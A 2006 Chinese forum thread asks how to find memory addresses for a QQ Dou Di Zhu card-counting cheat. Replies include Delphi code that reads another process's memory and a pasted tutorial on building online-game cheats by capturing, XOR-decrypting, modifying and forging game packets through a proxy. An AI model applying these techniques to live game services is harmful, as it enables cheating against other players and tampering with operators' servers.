得到QQ斗地主记牌器的所需内存值(200分)

eire · 2006-04-06

* * // * *                        DDZ ++　内存扫描版                        * * // * *　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　* * // * ******************************************************************** * // * *　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　* * // * * 特别提醒：　　　　　　　　　　　　　　　　　　　　　　　　　　　 * * // * * 　　该代码仅供学习编程所用，我不赞成将该软件用作任何商业用途，代 * * // * * 码可能存在不稳定现象，有兴趣的朋友不妨完善之。                   * * // * * 　　　　　　　　　　　　　　　　　　　　　who&who 　　　　　　　 * * // * * 　　　　　　　　　　　　　　　　　　　whoawho@qianlong.com       * * // * * 　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 * * // * ******************************************************************** * 座签位置0 $0041D024 手中牌面 $0041D164 手中牌数量 $0041D178 出牌牌面 $0041D2B8 出牌数量 座签位置1 $0041D4A0 手中牌面 $0041D5E0 手中牌数量 $0041D5F4 出牌牌面 $0041D734 出牌数量 座签位置2 $0041D91C 手中牌面 $0041DA5C 手中牌数量 $0041DA70 出牌牌面 $0041DBB0 出牌数量 $00422960 底牌牌面 这是在DELPHIBOX中找到的一个DEMO,由于现在QQ斗地主升级了,不能用了,不知如何用WINHEX等工具查找这些值.请讲一下步骤.我朋友急用,在此感谢!!!!!

Ekin · 2006-04-07

關注……； 幫頂……；

hardware007 · 2006-04-07

关注

ivy1982 · 2006-04-07

呵呵找腾讯的人吧

delfier · 2006-04-07

正在研究外挂，看看先

qdlover · 2006-04-12

唉，这年头，打个牌都要作弊 rp啊rp

jsjxuwenjun · 2006-04-14

呵呵。。。。 想法够？？？？

超级牛X · 2006-06-26

SeekMyself · 2006-06-26

唉，这年头，打个牌都要作弊 ------ 能作出来，并能看到别人的牌，可以这样说，谁先作出来就会是百万富翁，因为在电脑前面的MM（变态的）是不在乎钱的，当然，开发游戏的除外！

llaaddoo · 2006-06-26

你当开发游戏的都是SB呢？ 能看见别人的牌那是见鬼了... 最多能做个小挂来记已经出了的牌和自己手上的牌...

fenian · 2006-06-26

integer(对象名) longword(对象名)

st52 · 2006-06-28

他的每一张牌都是在网络上```自己并不会传送别人的牌的`1`~~~

jenhon · 2006-06-28

严重同意楼上们。 开发这样的一个游戏，肯定不会傻到把全部资料都发送到每个客户端，最多就时该客户端的牌和已经打了的牌。

eire · 2006-07-14

谢谢各位的答复！如何定位"已经打了的牌"的地址。

人在昆明 · 2006-07-14

在早期的联众打牌的游戏是这样的， 发牌的时候会把四家的牌都发给四个人，那么是可以分析的，我写过， 但是这个是源于他错误的设计 后来经过修正，他只传输你自己的给你 所以你的内存中没有其他人的牌 做一个分析每个人都出过什么牌的程序是可行的，但是意义不大

weiliu · 2006-07-25

问题: 如何实现象游戏修改器那样读取或修改正在运行的程序的内存的指定字节？ ( 积分: 100 )   分类: 非技术问题   来自: dprog, 时间: 2001-03-06 10:06:28, ID: 465493     我想做一个游戏的修改器，请问如何实现象游戏修改器那样读取或修改 正在运行的程序的内存的指定字节？请各位高手指点，最好有示例程序，谢谢 各位了！ 来自: jingtao, 时间: 2001-04-14 20:44:49, ID: 503372   http://www.csdn.net/magazine/source/2/Hero.doc 包括代码了原理，给分吧。 来自: timerri, 时间: 2001-04-17 11:11:31, ID: 506794   以下是摘抄，但是还有几个问题无法解决。如如何得到程序实际使用的内存区域，现在我再看上面的文章！！ ReadProcessMemory 读另一个进程的内存，原形如下： BOOL ReadProcessMemory( HANDLE hProcess, // 被读取进程的句柄； LPCVOID lpBaseAddress, // 读的起始地址； LPVOID lpBuffer, // 存放读取数据缓冲区； DWORD nSize, // 一次读取的字节数； LPDWORD lpNumberOfBytesRead // 实际读取的字节数； ); hProcess 进程句柄可由OpenProcess 函数得到，原形如下： HANDLE OpenProcess( DWORD dwDesiredAccess, // 访问标志； BOOL bInheritHandle, // 继承标志； DWORD dwProcessId // 进程ID； ); ---- 当然，用完别忘了用 CloseHandle 关闭打开的句柄。读另一个进程的内存 dwDesiredAccess 须指定为 PROCESS_VM_READ ，写另一个进程的内存 dwDesiredAccess 须指定为 PROCESS_VM_WRITE ，继承标志无所谓，进程ID可由 Process32First 和 Process32Next 得到，这两个函数可以枚举出所有开启的进程，这样进程的信息也就得到了。 Process32First 和 Process32Next是由 TLHelp32 单元提供的，需在 uses 里加上TLHelp32。ToolsHelp32 封装了一些访问堆、线程、进程等的函数，只适用于Win9x，原形如下： BOOL WINAPI Process32First( HANDLE hSnapshot // 由 CreateToolhelp32Snapshot 返回 的系统快照句柄； LPPROCESSENTRY32 lppe // 指向一个 PROCESSENTRY32 结构； )； BOOL WINAPI Process32Next( HANDLE hSnapshot // 由 CreateToolhelp32Snapshot 返回 的系统快照句柄； LPPROCESSENTRY32 lppe // 指向一个 PROCESSENTRY32 结构； )； hSnapshot 由 CreateToolhelp32Snapshot 返回的系统快照句柄； CreateToolhelp32Snapshot 原形如下： HANDLE WINAPI CreateToolhelp32Snapshot( DWORD dwFlags, // 快照标志； DWORD th32ProcessID // 进程ID； ); 现在需要的是进程的信息，所以将 dwFlags 指定为 TH32CS_SNAPPROCESS， th32ProcessID 忽略；PROCESSENTRY32 结构如下： typedef struct tagPROCESSENTRY32 { DWORD dwSize; // 结构大小； DWORD cntUsage; // 此进程的引用计数； DWORD th32ProcessID; // 进程ID; DWORD th32DefaultHeapID; // 进程默认堆ID； DWORD th32ModuleID; // 进程模块ID； DWORD cntThreads; // 此进程开启的线程计数； DWORD th32ParentProcessID;// 父进程ID； LONG pcPriClassBase; // 线程优先权； DWORD dwFlags; // 保留； char szExeFile[MAX_PATH]; // 进程全名； } PROCESSENTRY32; ---- 至此，所用到的主要函数已介绍完,实现读内存只要从下到上依次调用上述函数即可，具体参见原代码： procedure TForm1.Button1Click(Sender: TObject); var FSnapshotHandle:THandle; FProcessEntry32:TProcessEntry32; Ret : BOOL; ProcessID : integer; ProcessHndle : THandle; lpBuffer

Byte; nSize: DWORD; lpNumberOfBytesRead: DWORD; i:integer; s:string; begin FSnapshotHandle:=CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS,0); //创建系统快照 FProcessEntry32.dwSize:=Sizeof(FProcessEntry32); //先初始化 FProcessEntry32 的大小 Ret:=Process32First(FSnapshotHandle,FProcessEntry32); while Ret do begin s:=ExtractFileName(FProcessEntry32.szExeFile); if s='KERNEL32.DLL' then begin ProcessID:=FProcessEntry32.th32ProcessID; s:=''; break; end; Ret:=Process32Next(FSnapshotHandle,FProcessEntry32); end; //循环枚举出系统开启的所有进程，找出“Kernel32.dll” CloseHandle(FSnapshotHandle); Memo1.Lines.Clear ; memo1.lines.add('Process ID '+IntToHex( FProcessEntry32.th32ProcessID,8)); memo1.lines.Add('File name '+FProcessEntry32.szExeFile); ////输出进程的一些信息 nSize:=4; lpBuffer:=AllocMem(nSize); ProcessHndle:=OpenProcess(PROCESS_VM_READ,false,ProcessID); memo1.Lines.Add ('Process Handle '+intTohex(ProcessHndle,8)); for i:=$00800001 to $0080005f do begin ReadProcessMemory( ProcessHndle, Pointer(i), lpBuffer, nSize, lpNumberOfBytesRead ); s:=s+intTohex(lpBuffer^,2)+' '; //读取内容 if (i mod 16) =0 then begin Memo1.Lines.Add(s); s:=''; end; //格式化输出 end; FreeMem(lpBuffer,nSize); CloseHandle(ProcessHndle); //关闭句柄，释放内存 end; /////////////////////////////////////////////////////////// 编写16位程序访问指定内存的值的函数: {Access Memory for win31&win95} {must compile with delphi1.0---16bit App} {no VXD or DLL need} {pure native source code here,all include} {Writen by Xueyu,LEE} const fMemoryMapped:boolean=false; var fSelector :word;   fBaseAddr :LongInt;   fMemoryPointer

ointer;   fMemorySize :Word; function  MapPhysMemory(PhAddr:LongInt; Size:Word)

ointer; {input: } { phAddr: physics Address} { Size  : Alloc Size(bytes)} {output:} { Result: pointer to the physics memory} {example:} { access the address 0:$123} { ptr:=MapPhysMemory($123,1)} begin Result:=fMemoryPointer; if fMemoryMapped then UnmapPhysMemory; fMemorySize:=Size; fBaseAddr:=PhAddr; fMemoryMapped:=TRUE; fSelector:=AllocSelector(DSeg); SetSelectorBase(fSelector,PhAddr); SetSelectorLimit(fSelector,Size); fMemoryPointer:=Ptr(fSelector,0); Result:=fMemoryPointer; end; procedure UnmapPhysMemory; begin if fMemoryMapped then FreeSelector(fSelector); fSelector:=0; fMemoryMapped:=FALSE; fBaseAddr:=0; fMemoryPointer:=NIL; fMemorySize:=0; end; /////////////////////////////////////////// BOOL DebugActiveProcess(DWORD dwProcessId); //将dwProceeeID进程设置为被当前进程调试 BOOL ReadProcessMemory(   HANDLE hProcess, // handle of the process whose memory is read     LPCVOID lpBaseAddress, // address to start reading   LPVOID lpBuffer, // address of buffer to place read data   DWORD nSize, // number of bytes to read   LPDWORD lpNumberOfBytesRead  // address of number of bytes read &nbsp

; BOOL WriteProcessMemory(   HANDLE hProcess, // handle to process whose memory is written to     LPVOID lpBaseAddress, // address to start writing to   LPVOID lpBuffer, // pointer to buffer to write data to   DWORD nSize, // number of bytes to write   LPDWORD lpNumberOfBytesWritten  // actual number of bytes written &nbsp

; 可以干任何肮脏的事情...... 来自: wjiachun, 时间: 2001-09-13 15:43:00, ID: 624098   多人接受答案了。 问题讨论没有结束 ...

weiliu · 2006-07-25

问题: 游戏外挂怎么写的 ( 积分: 300 )   分类: 图形图象   来自: S3D4, 时间: 2005-01-15 20:42:00, ID: 2966212   大家玩过CS反恐精英之类的第一视角枪战游戏的话，就知道拿狙的时候是没有瞄准点的， 我也不是想实现什么大不了的功能，就是想在屏幕正中间显示一个大大的“十”字的瞄 准镜，当然是在游戏运行过程中完成了，不知道有没有人给个思路？ 应该是OpenGL或者DirectX方面的问题，如果那位兄台给点提示，感激不尽，感激不尽！ 来自: fei_l, 时间: 2005-01-15 22:29:08, ID: 2966297   这不是外挂的问题吧 你的意思就是在运行游戏时，在屏幕中心显示一个大大的“十”字 用透明窗口技术画一个大大的“十”字，将“外挂”窗口置在最上面就行 来自: menway, 时间: 2005-01-19 13:42:13, ID: 2970035   opengl里面屏幕2d向3d的转换的确是个很棘手的问题：（ 来自: weiliu, 时间: 2005-01-19 14:03:25, ID: 2970060   网络游戏外挂编写初级教程 （加入日期:2003-10-23 点击数:23302） 【对此文发表评论】【编程爱好者论坛】【保存文章至硬盘】  【打印文章】 做自己喜欢的！ ------ 明天你来自己做外挂随着网络游戏的日益火爆，很多玩家都投身到游戏中。目前很多玩家都依赖于一些游戏的外挂程序来进行游戏。那么做一个游戏的外挂程序是否是一件很困难的事呢？回答是"否"，诚然编写一些程序是需要一些基本知识的，所以我们想以最简单的语言来给你讲授编写外挂程序的一些技巧，一些方法，并提供给你一些基本的辅助工具，即使你是一个菜鸟，看了我们的教程，并技巧地使用我们提供给你的工具，你完全能够编写出一个完全属于你自己的外挂。在本教程内，我们提供了金庸群侠传，以及网络三国这两个游戏的修改实际例子，因为这两款游戏都是对封包进行过加密运算的，如果你对这两个游戏的修改有了一定的了解后，相信你在其他游戏中也能非常好地做出属于自己的外挂。我们提供了金庸打增援20个NPC和网络三国在PK中自动吃药，自动发镖这两个实际的例子，让你上手更容易。我们也会本教程内附上这两个软件以提供给你使用和学习。我们会在教程内讲授给你怎么去破解封包的加密算法，怎么利用我们提供给你工具来伪造和发送封包。本教程除了文字教程外，我们还会提供金庸群侠和三国的外挂程序，另外还提供6个外挂制作工具，以供你使用。希望在以后的游戏中，每一个玩家都能够在游戏中成长起来，不但游戏玩的出色，修改游戏也同样出色，做一个真正的游戏DIY。要想在修改游戏中做到百战百胜，是需要相当丰富的计算机知识的。有很多计算机高手就是从玩游戏，修改游戏中，逐步对计算机产生浓厚的兴趣，逐步成长起来的。不要在羡慕别人能够做到的，因为别人能够做的你也能够！我相信你们看了本教程后，会对游戏有一个全新的认识，呵呵，因为我是个好老师！（别拿鸡蛋砸我呀，救命啊！#￥%……*）　　不过要想从修改游戏中学到知识，增加自己的计算机水平，可不能只是靠修改游戏呀！要知道，修改游戏只是一个验证你对你所了解的某些计算机知识的理解程度的场所，只能给你一些发现问题、解决问题的机会，只能起到帮助你提高学习计算机的兴趣的作用，而决不是学习计算机的捷径。 -------------------------------------------------------------------------------- 一：什么叫外挂？ 现在的网络游戏多是基于Internet上客户／服务器模式，服务端程序运行在游戏服务器上，游戏的设计者在其中创造一个庞大的游戏空间，各地的玩家可以通过运行客户端程序同时登录到游戏中。简单地说，网络游戏实际上就是由游戏开发商提供一个游戏环境，而玩家们就是在这个环境中相对自由和开放地进行游戏操作。那么既然在网络游戏中有了服务器这个概念，我们以前传统的修改游戏方法就显得无能为力了。记得我们在单机版的游戏中，随心所欲地通过内存搜索来修改角色的各种属性，这在网络游戏中就没有任何用处了。因为我们在网络游戏中所扮演角色的各种属性及各种重要资料都存放在服务器上，在我们自己机器上（客户端）只是显示角色的状态，所以通过修改客户端内存里有关角色的各种属性是不切实际的。那么是否我们就没有办法在网络游戏中达到我们修改的目的？回答是"否"。我们知道Internet客户／服务器模式的通讯一般采用TCP/IP通信协议，数据交换是通过IP数据包的传输来实现的，一般来说我们客户端向服务器发出某些请求，比如移动、战斗等指令都是通过封包的形式和服务器交换数据。那么我们把本地发出消息称为SEND，意思就是发送数据，服务器收到我们SEND的消息后，会按照既定的程序把有关的信息反馈给客户端，比如，移动的坐标，战斗的类型。那么我们把客户端收到服务器发来的有关消息称为RECV。知道了这个道理，接下来我们要做的工作就是分析客户端和服务器之间往来的数据（也就是封包），这样我们就可以提取到对我们有用的数据进行修改，然后模拟服务器发给客户端，或者模拟客户端发送给服务器，这样就可以实现我们修改游戏的目的了。目前除了修改游戏封包来实现修改游戏的目的，我们也可以修改客户端的有关程序来达到我们的要求。我们知道目前各个服务器的运算能力是有限的，特别在游戏中，游戏服务器要计算游戏中所有玩家的状况几乎是不可能的，所以有一些运算还是要依靠我们客户端来完成，这样又给了我们修改游戏提供了一些便利。比如我们可以通过将客户端程序脱壳来发现一些程序的判断分支，通过跟踪调试我们可以把一些对我们不利的判断去掉，以此来满足我们修改游戏的需求。在下几个章节中，我们将给大家讲述封包的概念，和修改跟踪客户端的有关知识。大家准备好了吗？ 游戏数据格式和存储： 在进行我们的工作之前，我们需要掌握一些关于计算机中储存数据方式的知识和游戏中储存数据的特点。本章节是提供给菜鸟级的玩家看的，如果你是高手就可以跳过了，呵呵！　　如果，你想成为无坚不摧的剑客，那么，这些东西就会花掉你一些时间；如果，你只想作个江湖的游客的话，那么这些东西，了解与否无关紧要。是作剑客，还是作游客，你选择吧！ 现在我们开始！首先，你要知道游戏中储存数据的几种格式，这几种格式是：字节(BYTE)、字(WORD)和双字(DOUBLE WORD)，或者说是8位、16位和32位储存方式。字节也就是8位方式能储存0~255的数字；字或说是16位储存方式能储存0~65535的数；双字即32位方式能储存0~4294967295的数。 为何要了解这些知识呢？在游戏中各种参数的最大值是不同的，有些可能100左右就够了，比如，金庸群侠传中的角色的等级、随机遇敌个数等等。而有些却需要大于255甚至大于65535，象金庸群侠传中角色的金钱值可达到数百万。所以，在游戏中各种不同的数据的类型是不一样的。在我们修改游戏时需要寻找准备修改的数据的封包，在这种时候，正确判断数据的类型是迅速找到正确地址的重要条件。 　　在计算机中数据以字节为基本的储存单位，每个字节被赋予一个编号，以确定各自的位置。这个编号我们就称为地址。 在需要用到字或双字时，计算机用连续的两个字节来组成一个字，连续的两个字组成一个双字。而一个字或双字的地址就是它们的低位字节的地址。现在我们常用的Windows 9x操作系统中，地址是用一个32位的二进制数表示的。而在平时我们用到内存地址时，总是用一个8位的16进制数来表示它。 二进制和十六进制又是怎样一回事呢？ 　　简单说来，二进制数就是一种只有0和1两个数码，每满2则进一位的计数进位法。同样，16进制就是每满十六就进一位的计数进位法。16进制有0--F十六个数字，它为表示十到十五的数字采用了A、B、C、D、E、F六个数字，它们和十进制的对应关系是：A对应于10，B对应于11，C对应于12，D对应于13，E对应于14，F对应于15。而且，16进制数和二进制数间有一个简单的对应关系，那就是；四位二进制数相当于一位16进制数。比如，一个四位的二进制数1111就相当于16进制的F，1010就相当于A。 了解这些基础知识对修改游戏有着很大的帮助，下面我就要谈到这个问题。由于在计算机中数据是以二进制的方式储存的，同时16进制数和二进制间的转换关系十分简单，所以大部分的修改工具在显示计算机中的数据时会显示16进制的代码，而且在你修改时也需要输入16进制的数字。你清楚了吧？ 　　在游戏中看到的数据可都是十进制的，在要寻找并修改参数的值时，可以使用Windows提供的计算器来进行十进制和16进制的换算，我们可以在开始菜单里的程序组中的附件中找到它。 　　现在要了解的知识也差不多了！不过，有个问题在游戏修改中是需要注意的。在计算机中数据的储存方式一般是低位数储存在低位字节，高位数储存在高位字节。比如，十进制数41715转换为16进制的数为A2F3，但在计算机中这个数被存为F3A2。 看了以上内容大家对数据的存贮和数据的对应关系都了解了吗？好了，接下来我们要告诉大家在游戏中，封包到底是怎么一回事了，来！大家把袖口卷起来，让我们来干活吧！ -------------------------------------------------------------------------------- 二：什么是封包？ 怎么截获一个游戏的封包？怎么去检查游戏服务器的ip地址和端口号？ Internet用户使用的各种信息服务，其通讯的信息最终均可以归结为以IP包为单位的信息传送，IP包除了包括要传送的数据信息外，还包含有信息要发送到的目的IP地址、信息发送的源IP地址、以及一些相关的控制信息。当一台路由器收到一个IP数据包时，它将根据数据包中的目的IP地址项查找路由表，根据查找的结果将此IP数据包送往对应端口。下一台IP路由器收到此数据包后继续转发，直至发到目的地。路由器之间可以通过路由协议来进行路由信息的交换，从而更新路由表。 那么我们所关心的内容只是IP包中的数据信息，我们可以使用许多监听网络的工具来截获客户端与服务器之间的交换数据，下面就向你介绍其中的一种工具：WPE。 WPE使用方法：执行WPE会有下列几项功能可选择： SELECT GAME选择目前在记忆体中您想拦截的程式，您只需双击该程式名称即可。 TRACE追踪功能。用来追踪撷取程式送收的封包。WPE必须先完成点选欲追踪的程式名称，才可以使用此项目。按下Play键开始撷取程式收送的封包。您可以随时按下 | | 暂停追踪，想继续时请再按下 | | 。按下正方形可以停止撷取封包并且显示所有已撷取封包内容。若您没按下正方形停止键，追踪的动作将依照OPTION里的设定值自动停止。如果您没有撷取到资料，试试将OPTION里调整为Winsock Version 2。WPE 及 Trainers 是设定在显示至少16 bits 颜色下才可执行。 FILTER过滤功能。用来分析所撷取到的封包，并且予以修改。 SEND PACKET送出封包功能。能够让您送出假造的封包。 TRAINER MAKER制作修改器。 OPTIONS设定功能。让您调整WPE的一些设定值。 FILTER的详细教学 - 当FILTER在启动状态时，ON的按钮会呈现红色。- 当您启动FILTER时，您随时可以关闭这个视窗。FILTER将会保留在原来的状态，直到您再按一次 on / off 钮。- 只有FILTER启用钮在OFF的状态下，才可以勾选Filter前的方框来编辑修改。- 当您想编辑某个Filter，只要双击该Filter的名字即可。 NORMAL MODE： 范例： 当您在 Street Fighter Online ﹝快打旋风线上版﹞游戏中，您使用了两次火球而且击中了对方，这时您会撷取到以下的封包：SEND-> 0000 08 14 21 06 01 04 SEND-> 0000 02 09 87 00 67 FF A4 AA 11 22 00 00 00 00 SEND-> 0000 03 84 11 09 11 09 SEND-> 0000 0A 09 C1 10 00 00 FF 52 44 SEND-> 0000 0A 09 C1 10 00 00 66 52 44 您的第一个火球让对方减了16滴﹝16 = 10h﹞的生命值，而您观察到第4跟第5个封包的位置4有10h的值出现，应该就是这里了。 您观察10h前的0A 09 C1在两个封包中都没改变，可见得这3个数值是发出火球的关键。 因此您将0A 09 C1 10填在搜寻列﹝SEARCH﹞，然后在修改列﹝MODIFY﹞的位置4填上FF。如此一来，当您再度发出火球时，FF会取代之前的10，也就是攻击力为255的火球了！ ADVANCED MODE： 范例：当您在一个游戏中，您不想要用真实姓名，您想用修改过的假名传送给对方。在您使用TRACE后，您会发现有些封包里面有您的名字出现。假设您的名字是Shadow，换算成16进位则是﹝53 68 61 64 6F 77﹞；而您打算用moon﹝6D 6F 6F 6E 20 20﹞来取代他。1) SEND-> 0000 08 14 21 06 01 042) SEND-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05 3) SEND-> 0000 03 84 11 09 11 094) SEND-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11 5) SEND-> 0000 0A 09 C1 10 00 00 66 52 44 但是您仔细看，您的名字在每个封包中并不是出现在相同的位置上 - 在第2个封包里，名字是出现在第4个位置上- 在第4个封包里，名字是出现在第6个位置上 在这种情况下，您就需要使用ADVANCED MODE- 您在搜寻列﹝SEARCH﹞填上：53 68 61 64 6F 77 ﹝请务必从位置1开始填﹞- 您想要从原来名字Shadow的第一个字母开始置换新名字，因此您要选择从数值被发现的位置开始替代连续数值﹝from the position of the chain found﹞。- 现在，在修改列﹝MODIFY﹞000的位置填上：6D 6F 6F 6E 20 20 ﹝此为相对应位置，也就是从原来搜寻栏的+001位置开始递换﹞- 如果您想从封包的第一个位置就修改数值，请选择﹝from the beginning of the packet﹞ 了解一点TCP/IP协议常识的人都知道，互联网是将信息数据打包之后再传送出去的。每个数据包分为头部信息和数据信息两部分。头部信息包括数据包的发送地址和到达地址等。数据信息包括我们在游戏中相关操作的各项信息。那么在做截获封包的过程之前我们先要知道游戏服务器的IP地址和端口号等各种信息，实际上最简单的是看看我们游戏目录下，是否有一个SERVER.INI的配置文件，这个文件里你可以查看到个游戏服务器的IP地址，比如金庸群侠传就是如此，那么除了这个我们还可以在DOS下使用NETSTAT这个命令， NETSTAT命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。或者你可以使用木马客星等工具来查看网络连接。工具是很多的，看你喜欢用哪一种了。 NETSTAT命令的一般格式为：NETSTAT [选项] 命令中各选项的含义如下：-a 显示所有socket，包括正在监听的。-c 每隔1秒就重新显示一遍，直到用户中断它。-i 显示所有网络接口的信息。-n 以网络IP地址代替名称，显示出网络连接情形。-r 显示核心路由表，格式同"route -e"。-t 显示TCP协议的连接情况。-u 显示UDP协议的连接情况。-v 显示正在进行的工作。 -------------------------------------------------------------------------------- 三：怎么来分析我们截获的封包？ 首先我们将WPE截获的封包保存为文本文件，然后打开它，这时会看到如下的数据（这里我们以金庸群侠传里PK店小二客户端发送的数据为例来讲解）： 第一个文件：SEND-> 0000 E6 56 0D 22 7E 6B E4 17 13 13 12 13 12 13 67 1BSEND-> 0010 17 12 DD 34 12 12 12 12 17 12 0E 12 12 12 9BSEND-> 0000 E6 56 1E F1 29 06 17 12 3B 0E 17 1ASEND-> 0000 E6 56 1B C0 68 12 12 12 5ASEND-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12SEND-> 0000 E6 56 17 C9 12 第二个文件：SEND-> 0000 83 33 68 47 1B 0E 81 72 76 76 77 76 77 76 02 7ESEND-> 0010 72 77 07 1C 77 77 77 77 72 77 72 77 77 77 6DSEND-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3SEND-> 0000 83 33 7E A5 21 77 77 77 3FSEND-> 0000 83 33 67 AD 76 CF 1B 0E 81 72 75 50 42 76 77 77SEND-> 0000 83 33 72 AC 77 我们发现两次PK店小二的数据格式一样，但是内容却不相同，我们是PK的同一个NPC，为什么会不同呢？原来金庸群侠传的封包是经过了加密运算才在网路上传输的，那么我们面临的问题就是如何将密文解密成明文再分析了。 因为一般的数据包加密都是异或运算，所以这里先讲一下什么是异或。简单的说，异或就是"相同为0，不同为1"（这是针对二进制按位来讲的），举个例子，0001和0010异或，我们按位对比，得到异或结果是0011，计算的方法是：0001的第4位为0，0010的第4位为0，它们相同，则异或结果的第4位按照"相同为0，不同为1"的原则得到0，0001的第3位为0，0010的第3位为0，则异或结果的第3位得到0，0001的第2位为0，0010的第2位为1，则异或结果的第2位得到1，0001的第1位为1，0010的第1位为0，则异或结果的第1位得到1，组合起来就是0011。异或运算今后会遇到很多，大家可以先熟悉熟悉，熟练了对分析很有帮助的。 下面我们继续看看上面的两个文件，按照常理，数据包的数据不会全部都有值的，游戏开发时会预留一些字节空间来便于日后的扩充，也就是说数据包里会存在一些"00"的字节，观察上面的文件，我们会发现文件一里很多"12"，文件二里很多"77"，那么这是不是代表我们说的"00"呢？推理到这里，我们就开始行动吧！ 我们把文件一与"12"异或，文件二与"77"异或，当然用手算很费事，我们使用"M2M 1.0 加密封包分析工具"来计算就方便多了。得到下面的结果： 第一个文件：1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 892 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 083 SEND-> 0000 F4 44 09 D2 7A 00 00 00 484 SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 005 SEND-> 0000 F4 44 05 DB 00 第二个文件：1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 70 6B 00 00 00 00 05 00 05 00 00 00 1A2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 843 SEND-> 0000 F4 44 09 D2 56 00 00 00 484 SEND-> 0000 F4 44 10 DA 01 B8 6C 79 F6 05 02 27 35 01 00 005 SEND-> 0000 F4 44 05 DB 00 哈，这一下两个文件大部分都一样啦，说明我们的推理是正确的，上面就是我们需要的明文！ 接下来就是搞清楚一些关键的字节所代表的含义，这就需要截获大量的数据来分析。 首先我们会发现每个数据包都是"F4 44"开头，第3个字节是变化的，但是变化很有规律。我们来看看各个包的长度，发现什么没有？对了，第3个字节就是包的长度！通过截获大量的数据包，我们判断第4个字节代表指令，也就是说客户端告诉服务器进行的是什么操作。例如向服务器请求战斗指令为"30"，战斗中移动指令为"D4"等。接下来，我们就需要分析一下上面第一个包"F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 89"，在这个包里包含什么信息呢？应该有通知服务器你PK的哪个NPC吧，我们就先来找找这个店小二的代码在什么地方。我们再PK一个小喽罗（就是大理客栈外的那个咯）：SEND-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 8A 19 00 00 00 00 11 00 02 00 00 00 C0 我们根据常理分析，游戏里的NPC种类虽然不会超过65535（FFFF），但开发时不会把自己限制在字的范围，那样不利于游戏的扩充，所以我们在双字里看看。通过"店小二"和"小喽罗"两个包的对比，我们把目标放在"6C 79 F6 05"和"CF 26 00 00"上。（对比一下很容易的，但你不能太迟钝咯，呵呵）我们再看看后面的包，在后面的包里应该还会出现NPC的代码，比如移动的包，游戏允许观战，服务器必然需要知道NPC的移动坐标，再广播给观战的其他玩家。在后面第4个包"SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"里我们又看到了"6C 79 F6 05"，初步断定店小二的代码就是它了！（这分析里边包含了很多工作的，大家可以用WPE截下数据来自己分析分析） 第一个包的分析暂时就到这里（里面还有的信息我们暂时不需要完全清楚了） 我们看看第4个包"SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"，再截获PK黄狗的包，（狗会出来2只哦）看看包的格式：SEND-> 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00SEND-> 0010 EB 03 F8 05 02 27 36 01 00 00 根据上面的分析，黄狗的代码为"4B 7D F6 05"（100040011），不过两只黄狗服务器怎样分辨呢？看看"EB 03 F8 05"（100140011），是上一个代码加上100000，呵呵，这样服务器就可以认出两只黄狗了。我们再通过野外遇敌截获的数据包来证实，果然如此。 那么，这个包的格式应该比较清楚了：第3个字节为包的长度，"DA"为指令，第5个字节为NPC个数，从第7个字节开始的10个字节代表一个NPC的信息，多一个NPC就多10个字节来表示。 大家如果玩过网金，必然知道随机遇敌有时会出现增援，我们就利用游戏这个增援来让每次战斗都会出现增援的NPC吧。 通过在战斗中出现增援截获的数据包，我们会发现服务器端发送了这样一个包：F4 44 12 E9 EB 03 F8 05 02 00 00 03 00 00 00 00 00 00 第5-第8个字节为增援NPC的代码（这里我们就简单的以黄狗的代码来举例）。那么，我们就利用单机代理技术来同时欺骗客户端和服务器吧！ 好了，呼叫NPC的工作到这里算是完成了一小半，接下来的事情，怎样修改封包和发送封包，我们下节继续讲解吧。 -------------------------------------------------------------------------------- 四：怎么冒充"客户端"向"服务器"发我们需要的封包？ 这里我们需要使用一个工具，它位于客户端和服务器端之间，它的工作就是进行数据包的接收和转发，这个工具我们称为代理。如果代理的工作单纯就是接收和转发的话，这就毫无意义了，但是请注意：所有的数据包都要通过它来传输，这里的意义就重大了。我们可以分析接收到的数据包，或者直接转发，或者修改后转发，或者压住不转发，甚至伪造我们需要的封包来发送。 下面我们继续讲怎样来同时欺骗服务器和客户端，也就是修改封包和伪造封包。通过我们上节的分析，我们已经知道了打多个NPC的封包格式，那么我们就动手吧！ 首先我们要查找客户端发送的包，找到战斗的特征，就是请求战斗的第1个包，我们找"F4 44 1F 30"这个特征，这是不会改变的，当然是要解密后来查找哦。找到后，表示客户端在向服务器请求战斗，我们不动这个包，转发。继续向下查找，这时需要查找的特征码不太好办，我们先查找"DA"，这是客户端发送NPC信息的数据包的指令，那么可能其他包也有"DA"，没关系，我们看前3个字节有没有"F4 44"就行了。找到后，我们的工作就开始了！ 我们确定要打的NPC数量。这个数量不能很大，原因在于网金的封包长度用一个字节表示，那么一个包可以有255个字节，我们上面分析过，增加一个NPC要增加10个字节，所以大家算算就知道，打20个NPC比较合适。 然后我们要把客户端原来的NPC代码分析计算出来，因为增加的NPC代码要加上100000哦。再把我们增加的NPC代码计算出来，并且组合成新的封包，注意代表包长度的字节要修改啊，然后转发到服务器，这一步在编写程序的时候要注意算法，不要造成较大延迟。 上面我们欺骗服务器端完成了，欺骗客户端就简单了，^-^ 